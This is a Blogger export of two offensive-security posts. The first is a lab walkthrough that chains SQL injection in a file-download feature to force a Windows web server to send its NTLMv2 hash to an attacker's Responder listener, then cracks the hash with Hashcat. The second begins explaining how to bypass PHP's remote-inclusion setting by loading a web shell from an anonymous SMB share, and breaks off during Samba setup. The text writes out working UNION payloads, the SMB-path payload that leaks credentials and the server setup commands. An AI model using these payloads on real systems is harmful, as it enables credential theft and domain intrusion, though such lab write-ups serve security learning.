Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-66581013397907648892020-01-12T17:41:00.001+05:302023-11-23T10:33:21.483+05:30Stealing NTLMv2 hash by abusing SQL injection in File download functionality <div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
Pranaam to All _/\_ :)<br />
<br />
In
this blog post, I am going to explain about a scenario in which an
attacker can take advantage of SQL Injection vulnerability and can force
Web server to leak NTLMv2 hash.<br />
<br />
<span style="color: orange;"><b>Description of Vulnerability chain </b></span>
<br />
Here, we have a web application which has SQL Injection vulnerability in file
download functionality. Web application process the unsanitized user
input in SQL query and on the basis of the SQL query output, application
call a file download function. The file download function search for
the file name (returned by the SQL query) in web server file system and
stream it to user for download.<br />
<br />
<br />
<span style="color: orange;"><b>Environment Setup</b></span><br />
My demo environment had following things configured in place to perform this<br />
<ol style="text-align: left;">
<li><span style="color: white;"><span style="background-color: white;"><span style="background-color: black;"><span style="color: #fff2cc;">Windows Server 2012 box (IP - 192.168.56.2)</span></span></span></span></li>
<li><span style="color: #fff2cc;"><span style="background-color: black;">Windows 7 AD Client box (IP - 192.168.56.3)</span></span></li>
<li><span style="color: #fff2cc;"><span style="background-color: black;">Backbox Linux box (IP - 192.168.56.106)</span></span></li>
</ol>
Windows Server 2012 box: -<br />
This is Active Directory Domain Controller Machine.<br />
<br />
Windows 7 AD Client box: -<br />
This
machine has Windows 7 OS installed in it and part of Windows Active
Directory Domain. Web application is hosted in this machine and web
server is running with the privilege of one of the Windows Active
Directory Domain user (user box). <br />
<div>
<br />
Backbox Linux box: -<br />
This is attacker machine in which "<a href="https://github.com/lgandx/Responder" target="_blank">Responder</a>" tool is listening on port 445 for File Server Service SMB request. <br />
<br />
<br />
<span style="color: orange;"><b>Attack scenario outline</b></span><br />
Web
application is vulnerable to SQL Injection and return the file name in
SQL query output. Here, an attacker can inject SQL Injection query which
will return custom file name as SQL query output. Now, web application
call file download functionality and pass the file name returned by SQL
query to the function. File download function will check for file in
below mentioned locations:<br />
<ol style="text-align: left;">
<li>Local file system</li>
<li>Remote file system (SMB)</li>
</ol>
Attacker need to craft an SQL Injection query which return
remote file system SMB path where Responder tool is listening. file path
should be like this: </div>
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">\\Responder_Server_IP\file_name</textarea>
<br />
<br />
In my case, Responder machine IP is "192.168.56.106". So path will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">\\192.168.56.106\box.txt</textarea><br />
<br />
Web application pass the Responder listening machine SMB path as file to file download function.<br />
File
download function will make request to Responder listening machine to
access the file "box.txt" and here comes the Responder in action.
Responder will force web serve to authenticate itself to access the file
and web server forward the authentication details to Responder.<br />
<br />
<br />
<span style="color: orange;"><b>Download and start Responder on attacker machine</b></span><br />
Download
the tool and run it on interface which is reachable to Web application
server. In this case, web application is hosted in internal network and
IP range is "192.168.56.1-255" so responder is listening on interface
which has IP 192.168.56.106 (eth1)<br />
<br />
<textarea cols="45" rows="3" style="height: 60px; margin: 0px; width: 513px;">git clone https://github.com/lgandx/Responder-Windows.git
cd Responder-Windows
python Responder.py -I <interface_name>
</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXROKFTUbPNu-e0M3GKECtz2TpwHqpdCUq3BmfcYji7uv8upPpnUi_4hNJzN0jMGhTs1yEq4ir0EGvguvqzt_muDBMdOKgT9lJIuaHVy4jqkF_gfAhpS5gtdlhm0tx1TP0Hl2A0MryNNw/s1600/fd7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="828" data-original-width="1124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXROKFTUbPNu-e0M3GKECtz2TpwHqpdCUq3BmfcYji7uv8upPpnUi_4hNJzN0jMGhTs1yEq4ir0EGvguvqzt_muDBMdOKgT9lJIuaHVy4jqkF_gfAhpS5gtdlhm0tx1TP0Hl2A0MryNNw/s1600/fd7.png" /></a></div>
<br />
Interface name and IP on which Responder is listening:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NxLqhKovicVvs-oasdtcn7PAE5gGjKlwrVBTz9JM4nPzbXKewz1LR8W_vTxfvS24aYJdBfMv3qOGNw9Fn0f4pA1UnQQZG8NfqbBZWc8GWPMqfZVOF5LI4mTJCwpjH-poL0V0RSAdErc/s1600/fd8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="255" data-original-width="830" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NxLqhKovicVvs-oasdtcn7PAE5gGjKlwrVBTz9JM4nPzbXKewz1LR8W_vTxfvS24aYJdBfMv3qOGNw9Fn0f4pA1UnQQZG8NfqbBZWc8GWPMqfZVOF5LI4mTJCwpjH-poL0V0RSAdErc/s1600/fd8.png" /></a></div>
<br />
<span style="color: orange;"><b>Vulnerable code and web server environment</b></span><br />
Web application vulnerable code which is vulnerable to SQL Injection is:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0h6T2I8XgvjoNQsAy-wMdBDkr9imkNg7Tnm5T4wuNHw4eiWkbMR7iJARf1Da7mXjUakQsv4RbUftHpe5pNIA89-HCvfvHSu0arXylbWMniBWT-zf_lW_0A-q5cY1HN9-p20vUn9XFdU/s1600/code.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="858" data-original-width="1181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0h6T2I8XgvjoNQsAy-wMdBDkr9imkNg7Tnm5T4wuNHw4eiWkbMR7iJARf1Da7mXjUakQsv4RbUftHpe5pNIA89-HCvfvHSu0arXylbWMniBWT-zf_lW_0A-q5cY1HN9-p20vUn9XFdU/s1600/code.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
MySQL user is just a normal user account and do not has any special privileges like "file_priv".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg-qchymNboEd2BmrLZJlCBdCgXBJHctplDrhpfY_jWqXjZwfFhrBBwCW5aLbnr5bLZ-7sWLAIjG9-qa_D9USRaJE9POXN5evwESqqKAfZdvxC4tWItugUNibOU5dZ3dYoQbK_3JngUL0/s1600/up1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="497" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg-qchymNboEd2BmrLZJlCBdCgXBJHctplDrhpfY_jWqXjZwfFhrBBwCW5aLbnr5bLZ-7sWLAIjG9-qa_D9USRaJE9POXN5evwESqqKAfZdvxC4tWItugUNibOU5dZ3dYoQbK_3JngUL0/s1600/up1.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
The
vulnerable code is hosted in machine which has "Windows 7" OS installed
in it and IP of the machine is "192.168.56.3". This machine is part of
Windows Active directory Domain "lab.indishell.lab" </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWT9570bKlxjDL9v4lHWc7Li-mzAElRSqhv8l9Lw7WiNTYiWQlqvnMiFTd9EdumX1BUjU02OvGov7LA-LcR0XHK8o51REj5uZFGBbBIDZ67WjRO11wevsAsqA0YWlVEAuszJWsmIfgYQ/s1600/sys+info.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="780" data-original-width="1395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWT9570bKlxjDL9v4lHWc7Li-mzAElRSqhv8l9Lw7WiNTYiWQlqvnMiFTd9EdumX1BUjU02OvGov7LA-LcR0XHK8o51REj5uZFGBbBIDZ67WjRO11wevsAsqA0YWlVEAuszJWsmIfgYQ/s1600/sys+info.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Application
default behavior is, user need to specify the integer value to HTTP GET
method parameter "image" and application check if any image linked
with the specified value exist or not. If there is any image exist for
the specified value, application prompt with file download pop-up.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgJ6qaXoBJva0L2ZEZXX2CV4czHr0Csk53nYxERpkBjsHaBwXvC1uLQ91OpoILkJq3jCoCr7WUFy5FXRTZ7zcFiMEX0kFVsFF3A3QpdmBxseqWRbxJYFp2ymk2UJzXzdB8MI6ysfbHfQ/s1600/fd1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="733" data-original-width="1092" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgJ6qaXoBJva0L2ZEZXX2CV4czHr0Csk53nYxERpkBjsHaBwXvC1uLQ91OpoILkJq3jCoCr7WUFy5FXRTZ7zcFiMEX0kFVsFF3A3QpdmBxseqWRbxJYFp2ymk2UJzXzdB8MI6ysfbHfQ/s1600/fd1.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="color: orange;"><b>Identify number of columns in current SQL query</b></span><br />
In our case, SQL Injection point is vulnerable to Integer based SQL Injection.<br />
<br />
Remember,
if query execute properly and return output, we will get file download
pop-up. Application will not prompt with file download pop-up if SQL
query do not execute properly or some SQL server error occur.<br />
<br />
When appended "single quote", application showed error message.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA-oK8B2hINN3EcpOxGRo4W6cN5_8oAV54M6cfcY6MdHUu8Th0fUsGQ5_SYs0viLbt2oNnh3rxp7l54bVfyYNyRytGYt6mn_82zwP8KzorYn00NbblHNAIhk6uA9s-xXD9mcUERgstWac/s1600/fd2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="997" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA-oK8B2hINN3EcpOxGRo4W6cN5_8oAV54M6cfcY6MdHUu8Th0fUsGQ5_SYs0viLbt2oNnh3rxp7l54bVfyYNyRytGYt6mn_82zwP8KzorYn00NbblHNAIhk6uA9s-xXD9mcUERgstWac/s1600/fd2.png" /></a></div>
<br />
Let’s
find out column count by fuzzing web application. To find column count
we will use "order by" clause and will keep increasing the value in
order by clause until web application stop giving download pop-up.<br />
<br />
Application response when we injected parameter with SQL Injection payload "order by 1-- -".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvGbCnLr4cIJLRaL6Gqrq8VRsBuO_3dGVd5SQGg4TgAcaJH2ChFuJUEr_XssbVWQnzIQYGawImDHLN4rLKTyjUmV753NIbV5BzjuGwYjRwqYsXXBA5jiNJhiu8sOCd4lTs4HAAi4HmXGk/s1600/fd3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="710" data-original-width="1054" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvGbCnLr4cIJLRaL6Gqrq8VRsBuO_3dGVd5SQGg4TgAcaJH2ChFuJUEr_XssbVWQnzIQYGawImDHLN4rLKTyjUmV753NIbV5BzjuGwYjRwqYsXXBA5jiNJhiu8sOCd4lTs4HAAi4HmXGk/s1600/fd3.png" /></a></div>
<br />
Web
application is not prompting file download pop-up box when we increased
the value of order by clause from 1 to 4 which indicates that number of
column used by select statement is less than 4.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBo6jWQpEXz5KRd1qKAbMRMLy8Hfzc53Yhbxv8MtjcdXDBitNZsbEU9dbPY7aUhdP3vVWIRfgVXoZ7tgpywWF5wrTBlilrUeVwhzvfONqcBd0hho4kswYYfkQ67Au95uKrFcl8eehngDQ/s1600/fd4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="1099" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBo6jWQpEXz5KRd1qKAbMRMLy8Hfzc53Yhbxv8MtjcdXDBitNZsbEU9dbPY7aUhdP3vVWIRfgVXoZ7tgpywWF5wrTBlilrUeVwhzvfONqcBd0hho4kswYYfkQ67Au95uKrFcl8eehngDQ/s1600/fd4.png" /></a></div>
<br />
Now, inject URL with union statement with column count of 3. Payload will be like this: -<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">union select 1,2,3-- -</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWuYzFy-zGPZtHXV3G5IOm3CtZzXNZ06yYsTCwGq3UBFKyuHOL1vxRil_ZOIbSAAQM2Ls4Jgmg-x_I_Xib1KexEn38Fkf9nO6Y3Bj9Ree4cFfeDxAJ9f2AqJ4_Vhr42wPuUOwjeU8KACs/s1600/fd5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="706" data-original-width="1157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWuYzFy-zGPZtHXV3G5IOm3CtZzXNZ06yYsTCwGq3UBFKyuHOL1vxRil_ZOIbSAAQM2Ls4Jgmg-x_I_Xib1KexEn38Fkf9nO6Y3Bj9Ree4cFfeDxAJ9f2AqJ4_Vhr42wPuUOwjeU8KACs/s1600/fd5.png" /></a></div>
<br />
<span style="color: orange;"><b>Finding column number which is returning file name to file download function</b></span><b> </b><br />
<b>Note:</b><i>
Please make sure the actual value specified in vulnerable parameter is
non-existing so that SQL query return result of the injected query. In
this case, I added "." with value 2 to make it non-existing.</i> <br />
<br />
Now we have column count and we need to figure out the column number which will allow us to define path of the file.<br />
To
do this, we need to put file name or full path of the file (which we
want to download) in column one by one till we find out the column
number which pass the file name to file download function.<br />
<br />
We
can specify the any system file as well such as
"/Windows/System32/drivers/etc/hosts" in column and can observe if
application is prompting with file download pop-up.<br />
SQL Injection payload will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">union select 'file_name',2,3-- -</textarea><br />
<br />
And for file "hosts" from file system path "/Windows/System32/drivers/etc/", payload will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 497px;">union select '/Windows/System32/drivers/etc/hosts',2,3-- -</textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUH5yYYxcObaLbUu-vojU5k0j8dSaaXSUCBcAVRnS5PFIRzrP53a5i0frf0hpa95F_mnWjHxTJ6ziP9hpLAQmv3rSasOCBPg3K5vN2n2dFNroBVKVAIvmFXGxkp8zzzfq6-J7Tz6589kE/s1600/hosts1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="681" data-original-width="1271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUH5yYYxcObaLbUu-vojU5k0j8dSaaXSUCBcAVRnS5PFIRzrP53a5i0frf0hpa95F_mnWjHxTJ6ziP9hpLAQmv3rSasOCBPg3K5vN2n2dFNroBVKVAIvmFXGxkp8zzzfq6-J7Tz6589kE/s1600/hosts1.png" /></a></div>
<br />
If
application do not prompt for download pop-up, keep changing the column
numbers with file path. For example, let try if column number 2 result
is getting returned by SQL server for file download function, payload
will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 497px;">union select 1,'/Windows/System32/drivers/etc/hosts',3-- -</textarea><br />
<br />
In my case, column number 3 is the column which is returning the file path to application.<br />
So,
the below mentioned payload will return file path of "hosts" file to
file download function and we will get file download pop-up:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 497px;">union select 1,2,'/Windows/System32/drivers/etc/hosts'-- -</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnajv5HER4KnTN0hMAW1MA5KssIKnTuZCQA3gZGzQfsAvmKOh_KrkiyyXN6owUGSjtfBxVcOcm_SSVxa7RG50_iB4CF_XnMylzKliTwENSaj6S0VTmXXnnSYRAo4TQ9GT4paPGWYONPX0/s1600/hosts.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="667" data-original-width="1264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnajv5HER4KnTN0hMAW1MA5KssIKnTuZCQA3gZGzQfsAvmKOh_KrkiyyXN6owUGSjtfBxVcOcm_SSVxa7RG50_iB4CF_XnMylzKliTwENSaj6S0VTmXXnnSYRAo4TQ9GT4paPGWYONPX0/s1600/hosts.png" /></a></div>
<br />
<span style="color: orange;"><b>Exploiting the SQL Injection to leak the NTLMv2 hash</b></span><br />
Now,
once the file path returning column has been identified, we need to
specify the Responder listening machine IP with random file name.<br />
Payload will be like this:<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">union select 1,2,'\\\\192.168.56.106\\box.txt'-- -</textarea><br />
<br />
Check your Responder terminal and see if you got NTLMv2 hashes or not.<br />
In my case, I got the hash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_kY23hTUqEsp5Pdm2BYdMjboy3wbHfm8qVU9fYNYMds0hBg-ThBqMB0VMJAWALwbHF69q4kRSzuF9swjC8BaPMS3_hMhd9TIoYpnngrBdShNqukjgZISQZ2YIXNQ6kzG9cR37D4pNT1I/s1600/fd9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="846" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_kY23hTUqEsp5Pdm2BYdMjboy3wbHfm8qVU9fYNYMds0hBg-ThBqMB0VMJAWALwbHF69q4kRSzuF9swjC8BaPMS3_hMhd9TIoYpnngrBdShNqukjgZISQZ2YIXNQ6kzG9cR37D4pNT1I/s1600/fd9.png" /></a></div>
<br />
<span style="color: orange;"><b>Cracking the NTLMv2 hash using Hashcat</b></span><br />
To get plain text password of the captured NTLMv2 Hash, we can try with Hashcat Hash cracking tool.<br />
In
this scenario, I tried Dictionary based attack to check if the plain
text password of the NTLMv2 hash is present in the dictionary or not.
Password was weak so I got the plain text.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR5LgFsos3KTqGkSScIN5OyGBWUhoiVcHRvI1IO9PmrCrw6xO13YqU8FD8c9K_uIerMq6Rv0j9P6ojZUcx35TNCLygRAC8rdzJeiLLcmWY9i30B0TBhT6IElVShQEdq-s7NsZtdWa_P4M/s1600/fd10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR5LgFsos3KTqGkSScIN5OyGBWUhoiVcHRvI1IO9PmrCrw6xO13YqU8FD8c9K_uIerMq6Rv0j9P6ojZUcx35TNCLygRAC8rdzJeiLLcmWY9i30B0TBhT6IElVShQEdq-s7NsZtdWa_P4M/s1600/fd10.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
This NTLMv2 hash is of a Active Directory Domain user who has username "box". <br />
Now, we have username and password of a Domain user. Use these credentials in further exploitation.<br />
<br />Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>, <a href="https://twitter.com/Pwsecspirit" target="_blank">Spirited wolf</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
</div>
</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-13383010759166411032019-05-12T01:13:00.001+05:302023-11-22T11:16:56.410+05:30Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Pranaam to all _/\_<br />
In this blog post, I am going to demonstrate the technique of exploiting Remote File Inclusion (RFI) vulnerability in PHP applications which is vulnerable to "File Inclusion attack". We will bypass the Remote URL inclusion restriction and perform the exploitation of RFI even if PHP environment is configured not to include files from remote HTTP/FTP URL.<br />
<br />
<b><span style="color: red;">PHP and SMB share file access </span></b><br />
In PHP Configuration file, "allow_url_include" wrapper by-default set to "Off" which instruct PHP not to load remote HTTP or FTP URLs and hence prevent Remote File Inclusion attack. But, PHP does not block SMB URL loading even if "allow_url_include" and "allow_url_fopen" both are set to "Off". This behaviour of PHP can be abused to load remotely hosted PHP web shell from SMB share.<br />
<br />
<b><span style="color: red;">Attack scenario outline</span></b><br />
When vulnerable PHP application code try to load PHP web shell from attacker controlled SMB share, SMB share should allow access to the file. Attacker need to configure SMB server with anonymous browsing access enable on it. So, once vulnerable application try to access PHP web shell from SMB share, SMB server will not ask for any credential and PHP code of web shell will be included by the vulnerable application. <br />
<br />
Let's start, first of all I reconfigured PHP environment and disabled "allow_url_fopen" as well as "allow_url_include" in php.ini file. Later configured SMB server with anonymous read access. Once SMB share is ready, exploit the vulnerable application <br />
<br />
<b><span style="color: red;">PHP environment settings</span></b><br />
Machine which has vulnerable code hosted on it has "allow_url_fopen" and "allow_url_include" set to "Off"<br />
Screenshot of current configuration of the PHP version "5.5.11":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7t4Hs7BDFvhwHpPrBYxdGFlCed0_sUot8e-CLN1uAhStdIpA1ADSGGS3r5GM4YnzsDugfCNBtHiIhrirt3T9U8xZhHsHIybVBr0dkZkh4qQI050zHCpRt7RMGs8gNkxWwVfdrr0t_iXo/s1600/phpinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="389" data-original-width="1181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7t4Hs7BDFvhwHpPrBYxdGFlCed0_sUot8e-CLN1uAhStdIpA1ADSGGS3r5GM4YnzsDugfCNBtHiIhrirt3T9U8xZhHsHIybVBr0dkZkh4qQI050zHCpRt7RMGs8gNkxWwVfdrr0t_iXo/s1600/phpinfo.png" /></a></div>
<br />
Before proceeding, let's make sure PHP code is not allowing Remote File Inclusion when we try to access web shell hosted on HTTP.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROls7uW4a41ujDJ0SbaQVsduEQxaE9tCFVq8OK1tuAXbebUwQZk2L5-bxmBUvT4Mqp3-oBbpc6-51JiPiKj525PlFJNLjsuSV6VFC-_i1HwQwPu4byxz-wCA9skuhWo_JnGQ_ojdvUAA/s1600/rfi_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="308" data-original-width="1494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhROls7uW4a41ujDJ0SbaQVsduEQxaE9tCFVq8OK1tuAXbebUwQZk2L5-bxmBUvT4Mqp3-oBbpc6-51JiPiKj525PlFJNLjsuSV6VFC-_i1HwQwPu4byxz-wCA9skuhWo_JnGQ_ojdvUAA/s1600/rfi_check.png" /></a></div>
<br />
Application is throwing error and RFI is not happening when I tried to include PHP web shell from remote host.<br />
<br />
<b><span style="color: red;">Configuring the SAMBA server with anonymous read access (Linux Machine)</span></b><br />
Install SAMBA server using below mentioned command:<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> apt-get install samba</textarea><br />
<br />
Create SMB share directory (in my case /var/www/html/pub/)<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> mkdir /var/www/html/pub/ </textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlcwBda0DeEq_0h1iAtwccm6F9mudGPocNYuPol1kliDMIONX5tszs3ZUjYdd9LFkdzgSi64e7ga-Y-8RBrSyDJNUCiSKyKLtZoquxKZCmEHU_8eRs7vdOnVBsEyHCsuFfT2UJHDLVjs/s1600/rfi_mkdir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="172" data-original-width="599" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXlcwBda0DeEq_0h1iAtwccm6F9mudGPocNYuPol1kliDMIONX5tszs3ZUjYdd9LFkdzgSi64e7ga-Y-8RBrSyDJNUCiSKyKLtZoquxKZCmEHU_8eRs7vdOnVBsEyHCsuFfT2UJHDLVjs/s1600/rfi_mkdir.png" /></a></div>
<br />
Configure permissions on newly created SMB share directory:<br />
<br />
<textarea cols="45" rows="2" style="height: 41px; margin: 0px; width: 397px;">chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/</textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
